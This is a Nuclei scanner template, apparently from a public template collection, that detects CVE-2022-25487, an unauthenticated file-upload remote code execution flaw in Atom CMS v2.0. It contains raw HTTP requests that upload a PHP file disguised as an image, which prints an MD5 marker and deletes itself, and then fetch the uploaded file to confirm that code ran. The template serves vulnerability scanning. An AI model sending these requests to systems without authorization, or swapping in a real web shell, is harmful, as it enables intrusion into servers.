nuclei-templates/http/cves/2022/CVE-2022-25487.yaml

71 lines
2.4 KiB
YAML

id: CVE-2022-25487
info:
name: Atom CMS v2.0 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: Fixed in version Atom CMS v2.1
reference:
- https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html
- https://github.com/thedigicraft/Atom.CMS/issues/256
- https://nvd.nist.gov/vuln/detail/CVE-2022-25487
- https://github.com/ARPSyndicate/cvemon
- https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25487
cwe-id: CWE-434
epss-score: 0.78706
epss-percentile: 0.98263
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: thedigitalcraft
product: atomcms
tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload
variables:
string: "CVE-2022-25487"
http:
- raw:
- |
POST /admin/uploads.php?id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041
-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"
-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: image/jpeg
<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------30623082103363803402542706041--
- |
GET /uploads/{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(string)}}'
extractors:
- type: regex
name: filename
group: 1
regex:
- SET avatar = '(.*?)'
internal: true
# digest: 4a0a00473045022100a62df045c76e53bf8e6d631a87d8bf926e477a73cbc8494b2dcc7907e1e69ee1022052681e039ce72426d5d56584c8a0281f8e10794b22967d1474b0aefcaa6f2e3f:922c64590222798bb761d5b6d8e72950